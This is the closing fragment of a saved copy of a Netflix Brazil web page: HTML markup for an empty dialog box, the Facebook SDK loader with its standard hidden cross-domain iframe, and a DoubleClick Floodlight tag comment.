<div class="ui-dialog ui-widget ui-widget-content ui-corner-all ui-front nflx-layer ui-resizable" tabindex="-1" role="dialog" aria-describedby="nflx-layer" aria-labelledby="ui-id-1" style="display: none; position: absolute;"><div class="ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix"><span id="ui-id-1" class="ui-dialog-title">&nbsp;</span><button class="ui-button ui-widget ui-state-default ui-corner-all ui-button-icon-only ui-dialog-titlebar-close close" role="button" aria-disabled="false" title="close"></button></div><div id="nflx-layer" class="ui-dialog-content ui-widget-content"></div><div class="ui-resizable-handle ui-resizable-n" style="z-index: 90;"></div><div class="ui-resizable-handle ui-resizable-e" style="z-index: 90;"></div><div class="ui-resizable-handle ui-resizable-s" style="z-index: 90;"></div><div class="ui-resizable-handle ui-resizable-w" style="z-index: 90;"></div><div class="ui-resizable-handle ui-resizable-se ui-icon ui-icon-gripsmall-diagonal-se" style="z-index: 90;"></div><div class="ui-resizable-handle ui-resizable-sw" style="z-index: 90;"></div><div class="ui-resizable-handle ui-resizable-ne" style="z-index: 90;"></div><div class="ui-resizable-handle ui-resizable-nw" style="z-index: 90;"></div></div><div id="fb-root" class=" fb_reset"><script async src="./Netflix - Assista a séries online, Assista a filmes online_files/sdk.js" id="fb-jsapi"></script><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div><iframe name="fb_xdm_frame_https" frameborder="0" allowtransparency="true" scrolling="no" id="fb_xdm_frame_https" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tabindex="-1" src="./Netflix - Assista a séries online, Assista a filmes online_files/DU1Ia251o0y.html" style="border: none;"></iframe></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div></div><!--
Start of DoubleClick Floodlight Tag: Please do not remove
Activity name of this tag: (Global) :: All ODP (For Cookie Sync)
URL of the webpage where the tag is expected to be placed: http://movies.netflix.com/movie/
This tag must be placed between the <body> and </body> tags, as close as possible to the opening tag.
Creation Date: 06/05/2014
-->


<!-- End of DoubleClick Floodlight Tag: Please do not remove --></div></body></html>